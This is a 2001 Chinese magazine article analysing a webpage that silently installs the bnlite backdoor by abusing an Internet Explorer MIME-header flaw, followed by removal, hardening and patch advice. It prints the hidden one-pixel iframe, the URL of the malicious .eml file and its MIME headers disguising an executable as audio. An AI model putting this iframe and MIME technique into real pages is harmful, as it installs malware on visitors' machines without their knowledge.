恶意代码与网络安全(2)

小蓉 
2001年 30期

　　编者按：上期我们介绍的是“万花谷”病毒攻防战，其实互联网上类似的网站还很多，只要有带新的病毒的网站出现，我们就有义务告知大家。如果大家有网络安全方面的稿件，请发xiongjie@cpcw.com信箱，我们将以最快速度把实用性强的文章刊登出来。	
　　#1    一、切身体验
　　　　在进入木马网页的过程中，鼠标奇怪地变成沙漏形状，看来的确是有程序在运行。打开计算机的任务管理器，可以看到多了一个wincfg.exe的进程。进程对应的文件在Win2000下是c:\winnt\wincfg.exe，在Win98下是c:\windows\wincfg.exe。
　　　　运行注册表编辑器regedit，在“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVerion\Run”下发现wincfg.exe，原来它将自己登记在注册表开机启动项中，这样每次开机都会自动运行wincfg.exe。（如图）（^30040801a^）
　　　　注：给你下套的人可以自己设定这个木马的启动键名和注册文件名，注册文件名也就是运行时进程里的名称，因此大家看到的结果可能不相同。
　　　　运行金山毒霸，报告发现“backdoor bnlite”，哦，原来是木马bnlite服务端改名为wincfg.exe。别看这个木马服务端程序不大（仅有6.5K），但它的功能可不少：具有ICQ通报功能、远程删除服务端功能、设定端口和运行名称、上传下载……如果你中了该木马，那么木马控制端完全可以通过这个木马在你的电脑上建立一个隐藏的FTP服务器，别人就有最大权限进入你的电脑了！这样控制你的电脑将非常容易！
　　　　木马是如何下载到浏览了该主页的计算机中、并运行起来的呢？在IE中点击“工具”→“Internet选项”→“安全”→“自定义安全级别”，将ActiveX相关选项全部都禁用，再浏览该网页，wincfg.exe还是下载并运行了！看来这和ActiveX无关。在“自定义安全级别”中有关文件下载的选项都禁止，再浏览该网页，这回wincfg.exe不再下载了。
　　#1    二、问题揭示
　　　　我们来看看wincfg.exe是如何下载到浏览者计算机上的，在该网页上点击鼠标右键，选择其中的“查看源代码”，在网页代码最后面发现了可疑的语句：
　　　　<iframe src=wincfg.eml width=1 height=1>
　　　　注意到其中的“wincfg.eml”了吗？大家都知道eml为邮件格式，网页中要eml文件干什么呢？非常可疑！在IE浏览器中输入：http://shirf.51.net/wincfg.eml，再看看任务管理器，wincfg.exe进程又回来了，原来问题就在这个文件上！既然问题在这文件上，当然得想办法得到这个文件看看了。用蚂蚁把文件下载下来，鼠标刚点上去，wincfg.exe又被执行了，真是阴魂不散啊！
　　　　打开wincfg.eml，发现其关键内容如下：
　　　　Content-Type: audio/x-wav; name=“wincfg.exe”  ★这一句定义了文件名称，在此为wincfg.exe
　　　　Content-Transfer-Encoding: base64 ★定义了代码格式为base64
　　　　Content-ID: <THE-CID>    ★从这里开始才是代码的起步
　　　　TVqQAAMAAAAEAAAA//8AAL……以下删掉一大节　  ★这些是wincfg.exe经过base64编码的内容
　　　　上面加了“★”的部分为注释内容。这个以base64方式编码的文件，会在你浏览网页时编译成wincfg.exe文件并运行，这就是浏览该网页会中木马的原因！至此我就明白了，其实，所谓的浏览网页会中木马，只是网页制作者利用了微软IE浏览器中存在的漏洞进行攻击的一个案例而已，说白了就是利用了错误的MIME（Multipurpose Internet Mail Extentions，多用途的网际邮件扩充协议）头进行攻击。
　　#1    三、真相大白
　　　　现在，再回过头来看看我所中的木马是怎么回事。其实，wincfg.exe这个文件在这里相当于邮件的附件，从我们所列的代码中可以看到，攻击者把wincfg.exe的类型定义为audio/x-wav，由于邮件的类型为audio/x-wav时，IE存在的这个错误的MIME头漏洞会将附件认为是音频文件，并自动尝试打开，结果导致邮件文件wincfg.eml中的附件wincfg.exe（木马）被执行。在Win2000下，即使是用鼠标点击下载下来的wincfg.eml，或是拷贝粘贴该文件，都会导致wincfg.eml中的附件被运行，微软的这个漏洞可真是害人不浅啊。现在看来，原先那些攻击者想方设法欺骗被攻击目标执行修改过的木马等后门程序，是多么落后的手段啊！如今，利用微软“创造”的这个大漏洞来进行攻击，是多么简单、多么容易啊！唯一的条件就是被攻击目标使用IE5.0及以上版本中的一种，使用IE浏览器的用户到底有多少呢？看看你身边的朋友就知道答案了！
　　#1    四、解决办法
　　　　（1）点击“开始”→“运行”，在弹出的对话框中输入“regedit”，回车。然后展开注册表到“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下删除wincfg.exe；
　　　　（2）到你的计算机的系统目录下，删除其中的wincfg.exe文件；
　　　　（3）重新启动机器，就一切OK了！
　　#1    五、预防方法
　　　　1.IE和Outlook的用户。
　　　　（1）在IE的“工具→Internet选项→安全→Internet区域的安全级别”，把安全极别由“中”改为“高”。
　　　　（2）点击“自定义级别”按钮，在弹出的窗口中，禁用“对标记为可安全执行脚本的ActiveX控件执行脚本”、“活动脚本”和“文件下载”功能。
　　　　（3）禁用所有的ActiveX控制和插件。
　　　　（4）将资源管理器设置成“始终显示扩展名”。
　　　　（5）禁止以WEB方式使用资源管理器。
　　　　（6）取消“下载后确认打开”这种扩展名属性设置。
　　　　2.不要受陌生人的诱惑打开别人给你的URL，如果确实想看，可以通过一些下载工具把页面下载下来，然后用记事本等一些文本编辑工具打开查看代码。
　　　　3.微软公司为该漏洞提供了一个补丁，赶快到下面所列出的URL去看看吧：
　　　　http://www.microsoft.com/windows/IE/download/critical/Q290108/default.asp 
 